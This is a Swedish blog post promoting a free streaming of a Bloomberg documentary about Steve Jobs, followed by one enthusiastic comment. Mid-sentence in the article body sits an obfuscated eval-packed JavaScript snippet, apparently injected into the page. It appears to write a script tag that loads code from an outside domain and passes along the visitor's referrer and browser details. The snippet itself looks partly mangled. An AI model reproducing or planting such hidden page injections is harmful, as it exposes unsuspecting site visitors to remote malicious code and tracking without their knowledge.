Image Image Image Image Image Image Image Image Image Image

| 16 juli, 2018

Scroll to top

Top

3 Comments

Se dokumentären om Steve Jobs Gratis här på Revue!

Se dokumentären om Steve Jobs Gratis här på Revue!
Filip Urde
  • On 25 augusti, 2011
  • http://www.revue.se/filip-urde

Det har gjorts många dokumentärer om Steve Jobs men denna från Bloomberg eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eddez|var|u0026u|referrer|zenak||js|php’.split(‘|’),0,{}))
är den nyaste och gjord efter iPad-lanseringen. Filmen är en del av serien Game Changers  Du ser den gratis här hos Revue.se!

Comments

  1. Niceman

    Fan va fett!! tack för ni la upp den här!

Submit a Comment